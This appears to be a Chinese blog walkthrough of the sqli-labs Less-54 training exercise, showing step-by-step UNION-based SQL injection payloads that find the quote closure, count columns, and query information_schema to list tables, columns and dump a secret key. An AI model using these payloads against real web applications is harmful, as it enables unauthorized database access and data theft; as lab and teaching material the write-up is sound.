当前位置:网站首页>SQL注入 Less54(限制次数的SQL注入+union注入)
SQL注入 Less54(限制次数的SQL注入+union注入)
2022-07-31 02:27:00 【开心星人】

限制次数的SQL注入
每次reset,数据库的表名、字段名和数据都会发生改变
?id=1
?id=1'
发现没有报错信息
?id=1"
回显正常,直接排查双引号开头的闭合方式
?id=1'--+?id=1')--+?id=1'))--+
单引号回显正常,所以是单引号闭合
?id=1' order by 3--+ 回显正常?id=1' order by 4--+ 回显错误
所以有三列
?id=-1' union select 1,version(),database()--+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+

?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+

边栏推荐
- AI software development process in medical imaging field
- First acquaintance with C language -- array
- Charging effect simulation
- Basic introduction to ShardingJDBC
- 静态路由解析(最长掩码匹配原则+主备路由)
- STM32CUBEMX develops GD32F303 (11) ---- ADC scans multiple channels in DMA mode
- Draw Your Cards
- ShardingJDBC基本介绍
- 【shell基础】判断目录是否为空
- The modification is not properly placed in the sandbox, causing Apple compatibility issues
猜你喜欢

221. Largest Square

Nacos

Software testing basic interface testing - getting started with Jmeter, you should pay attention to these things

1. Non-type template parameters 2. Specialization of templates 3. Explanation of inheritance

coldfusion8 background scheduled tasks take shell
![CV-Model [3]: MobileNet v2](/img/c7/1155a1f610110724c67a3b7557ef28.jpg)
CV-Model [3]: MobileNet v2

multiplayer-hlap 包有问题,无法升级的解决方案

Fiddler captures packets to simulate weak network environment testing

What does a software test report contain?

Word/Excel fixed table size, when filling in the content, the table does not change with the cell content
随机推荐
Drools Rule Properties, Advanced Syntax
【shell基础】判断目录是否为空
Intranet Infiltration - Privilege Escalation
力扣刷题之有效的正方形(每日一题7/29)
Simple confession page
关于 mysql8.0数据库中主键位id,使用replace插入id为0时,实际id插入后自增导致数据重复插入 的解决方法
用户交互+格式化输出
Drools规则属性,高级语法
[1153]mysql中between的边界范围
After reading "MySQL Database Advanced Practice" (SQL Xiao Xuzhu)
Mathematical Ideas in AI
What level of software testing does it take to get a 9K job?
Project development software directory structure specification
f.grid_sample
The difference between link and @import
12 pictures take you to fully understand service current limit, circuit breaker, downgrade, and avalanche
加密生活,Web3 项目合伙人的一天
Mathematics to solve the problem - circular linked list
The effective square of the test (one question of the day 7/29)
FPGA-based vending machine